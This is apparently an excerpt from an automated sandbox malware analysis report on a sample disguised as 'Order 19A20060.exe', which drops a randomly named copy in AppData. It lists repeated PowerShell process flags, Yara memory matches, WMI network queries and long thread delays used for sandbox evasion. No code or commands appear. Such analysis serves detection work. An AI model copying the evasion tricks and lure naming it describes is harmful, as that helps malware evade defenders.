                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Process information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        Source: Yara match; File source: Process Memory Space: Order 19A20060.exe PID: 7420, type: MEMORYSTR
                        Source: Yara match; File source: Process Memory Space: SgJzugoOJvLgL.exe PID: 7964, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\Order 19A20060.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Memory allocated: 1750000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Memory allocated: 3160000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Memory allocated: 2F60000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Memory allocated: 8100000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Memory allocated: 9100000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Memory allocated: 92B0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Memory allocated: A2B0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Memory allocated: 13D0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Memory allocated: 2E70000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Memory allocated: 4E70000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe Memory allocated: 22C0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe Memory allocated: 2560000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe Memory allocated: 22C0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe Memory allocated: 6EB0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe Memory allocated: 7EB0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe Memory allocated: 8050000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe Memory allocated: 9050000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe Memory allocated: 2900000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe Memory allocated: 2B60000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe Memory allocated: 2990000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 1199937
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 1199828
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 1199718
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 1199609
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 1199500
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 1199390
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 1199281
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 1199172
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 1199062
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 1198953
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 1198844
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 1198719
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 1198609
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 1198500
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe Thread delayed: delay time: 1199953
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe Thread delayed: delay time: 1199844
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe Thread delayed: delay time: 1199734
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe Thread delayed: delay time: 1199625
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe Thread delayed: delay time: 1199515
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe Thread delayed: delay time: 1199406
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe Thread delayed: delay time: 1199297
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe Thread delayed: delay time: 1199187
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe Thread delayed: delay time: 1199078
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe Thread delayed: delay time: 1198969
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe Thread delayed: delay time: 1198844
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe Thread delayed: delay time: 1198734
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe Thread delayed: delay time: 1198625
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe Thread delayed: delay time: 1198515
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe Thread delayed: delay time: 1198406
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe Thread delayed: delay time: 1198297
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe Thread delayed: delay time: 1198187
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe Thread delayed: delay time: 1198078
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe Thread delayed: delay time: 1197969
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe Thread delayed: delay time: 1197859
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe Thread delayed: delay time: 1197750
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe Thread delayed: delay time: 1197640
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe Thread delayed: delay time: 1197531
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe Thread delayed: delay time: 1197422
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe Thread delayed: delay time: 1197312
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe Thread delayed: delay time: 1197202
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4072
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4673
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Window / User API: threadDelayed 3261
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Window / User API: threadDelayed 6584
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe Window / User API: threadDelayed 1097
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe Window / User API: threadDelayed 8756
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 7444 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7724 Thread sleep count: 4072 > 30
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7724 Thread sleep count: 271 > 30
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7896 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7788 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7940 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7880 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -27670116110564310s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -100000s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8108 Thread sleep count: 3261 > 30
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -99875s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8108 Thread sleep count: 6584 > 30
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -99765s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -99656s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -99547s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -99437s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -99328s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -99218s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -99109s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -98999s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -98891s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -98779s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -98656s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -98547s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -98437s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -98328s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -98219s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -98109s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -98000s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -97890s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -97781s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -97668s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -97547s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -97437s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -97327s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -97218s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -97109s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -96998s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -96875s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -96765s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -96651s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -96531s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -96422s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -96312s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -96203s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -96094s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -1199937s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -1199828s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -1199718s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -1199609s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -1199500s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -1199390s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -1199281s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -1199172s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -1199062s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -1198953s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -1198844s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -1198719s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -1198609s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100 Thread sleep time: -1198500s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 8036 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -22136092888451448s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -100000s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7412 Thread sleep count: 1097 > 30
